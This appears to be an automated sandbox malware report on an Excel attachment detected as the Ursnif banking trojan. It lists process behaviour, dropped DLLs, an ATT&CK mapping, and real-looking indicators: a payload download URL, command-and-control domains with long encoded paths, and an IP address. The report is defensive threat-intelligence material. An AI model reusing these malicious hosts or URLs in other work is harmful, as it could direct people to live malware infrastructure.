              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67DA7188 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67DA6CC5 push dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67DA70BE mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D35139 GetProcessHeap,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D35ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D35EA1 SetUnhandledExceptionFilter,

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 185.233.80.31 80
              Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: app.bighomegl.at
              Source: Yara matchFile source: app.xml, type: SAMPLE
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
              Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation2DLL Side-Loading1Process Injection12Masquerading111OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScripting1Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsNative API2Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerSecurity Software Discovery13SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsExploitation for Client Execution4Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSVirtualization/Sandbox Evasion1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonScripting1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRegsvr321Proc FilesystemSystem Information Discovery125Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433009 Sample: my_attach_82862.xlsb Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 36 authd.feronok.com 2->36 48 Multi AV Scanner detection for domain / URL 2->48 50 Found malware configuration 2->50 52 Antivirus detection for URL or domain 2->52 54 9 other signatures 2->54 7 EXCEL.EXE 27 43 2->7         started        12 iexplore.exe 2 83 2->12         started        14 iexplore.exe 1 50 2->14         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 46 quickbooks.aeymotors.com 50.87.220.158, 443, 49714 UNIFIEDLAYER-AS-1US United States 7->46 30 C:\Users\user\AppData\Local\...\soft[1].dll, PE32 7->30 dropped 32 C:\Users\Public\SettingSyncY.dll, PE32 7->32 dropped 34 C:\Users\user\...\~$my_attach_82862.xlsb, data 7->34 dropped 62 Document exploit detected (creates forbidden files) 7->62 64 Document exploit detected (UrlDownloadToFile) 7->64 18 regsvr32.exe 7->18         started        22 iexplore.exe 38 12->22         started        24 iexplore.exe 35 14->24         started        26 iexplore.exe 35 16->26         started        28 iexplore.exe 35 16->28         started        file6 signatures7 process8 dnsIp9 56 System process connects to network (likely due to code injection or exploit) 18->56 58 Writes or reads registry keys via WMI 18->58 60 Writes registry values via WMI 18->60 38 app.bighomegl.at 185.233.80.31, 49731, 49732, 49742 SUPERSERVERSDATACENTERRU Russian Federation 22->38 40 authd.feronok.com 22->40 42 authd.feronok.com 24->42 44 authd.feronok.com 28->44 signatures10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\SettingSyncY.dll6%MetadefenderBrowse
              C:\Users\Public\SettingSyncY.dll4%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll6%MetadefenderBrowse
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll4%ReversingLabs

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              3.2.regsvr32.exe.3010000.1.unpack100%AviraHEUR/AGEN.1108168Download File

              Domains

              SourceDetectionScannerLabelLink
              authd.feronok.com11%VirustotalBrowse
              app.bighomegl.at7%VirustotalBrowse
              quickbooks.aeymotors.com3%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://cdn.entity.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
              https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
              http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_20%Avira URL Cloudsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L30%Avira URL Cloudsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
              http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ0%Avira URL Cloudsafe
              http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/0%Avira URL Cloudsafe
              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
              https://ncus.pagecontentsync.0%URL Reputationsafe
              https://ncus.pagecontentsync.0%URL Reputationsafe
              https://ncus.pagecontentsync.0%URL Reputationsafe
              https://quickbooks.aeymotors.com/soft.dll100%Avira URL Cloudmalware
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              authd.feronok.com
              		185.233.80.31
              		truetrueunknown
              app.bighomegl.at
              		185.233.80.31
              		truetrueunknown
              quickbooks.aeymotors.com
              		50.87.220.158
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L3true
              • Avira URL Cloud: safe
              		unknown
              http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJtrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://api.diagnosticssdf.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                		high
                https://login.microsoftonline.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                  		high
                  https://shell.suite.office.com:1443D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                    		high
                    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                      		high
                      https://autodiscover-s.outlook.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                        		high
                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                          		high
                          https://cdn.entity.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://api.addins.omex.office.net/appinfo/queryD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                            		high
                            https://clients.config.office.net/user/v1.0/tenantassociationkeyD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                              		high
                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                		high
                                https://powerlift.acompli.netD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://rpsticket.partnerservices.getmicrosoftkey.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://lookup.onenote.com/lookup/geolocation/v1D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                  		high
                                  https://cortana.aiD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                    		high
                                    https://cloudfiles.onenote.com/upload.aspxD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                      		high
                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                        		high
                                        https://entitlement.diagnosticssdf.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                          		high
                                          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                            		high
                                            https://api.aadrm.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://ofcrecsvcapi-int.azurewebsites.net/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                              		high
                                              https://api.microsoftstream.com/api/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                		high
                                                https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                  		high
                                                  https://cr.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                    		high
                                                    https://portal.office.com/account/?ref=ClientMeControlD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                      		high
                                                      http://www.reddit.com/msapplication.xml4.20.drfalse
                                                        		high
                                                        https://graph.ppe.windows.netD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                          		high
                                                          https://res.getmicrosoftkey.com/api/redemptioneventsD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://powerlift-frontdesk.acompli.netD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://tasks.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                            		high
                                                            https://officeci.azurewebsites.net/api/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2~DF60CBFC830128400E.TMP.36.dr, {CFEFB1DE-CAAD-11EB-90E4-ECF4BB862DED}.dat.36.drtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/workD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                              		high
                                                              https://store.office.cn/addinstemplateD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://outlook.office.com/autosuggest/api/v1/init?cvid=D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                		high
                                                                https://globaldisco.crm.dynamics.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                  		high
                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                    		high
                                                                    https://store.officeppe.com/addinstemplateD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://dev0-api.acompli.net/autodetectD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.odwebp.svc.msD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://api.powerbi.com/v1.0/myorg/groupsD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                      		high
                                                                      https://web.microsoftstream.com/video/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                        		high
                                                                        https://graph.windows.netD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                          		high
                                                                          https://dataservice.o365filtering.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://officesetup.getmicrosoftkey.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://analysis.windows.net/powerbi/apiD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                            		high
                                                                            https://prod-global-autodetect.acompli.net/autodetectD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://outlook.office365.com/autodiscover/autodiscover.jsonD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                              		high
                                                                              https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                		high
                                                                                https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                  		high
                                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                    		high
                                                                                    http://www.youtube.com/msapplication.xml7.20.drfalse
                                                                                      		high
                                                                                      https://ncus.contentsync.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                        		high
                                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                          		high
                                                                                          http://weather.service.msn.com/data.aspxD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                            		high
                                                                                            https://apis.live.net/v5.0/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            		unknown
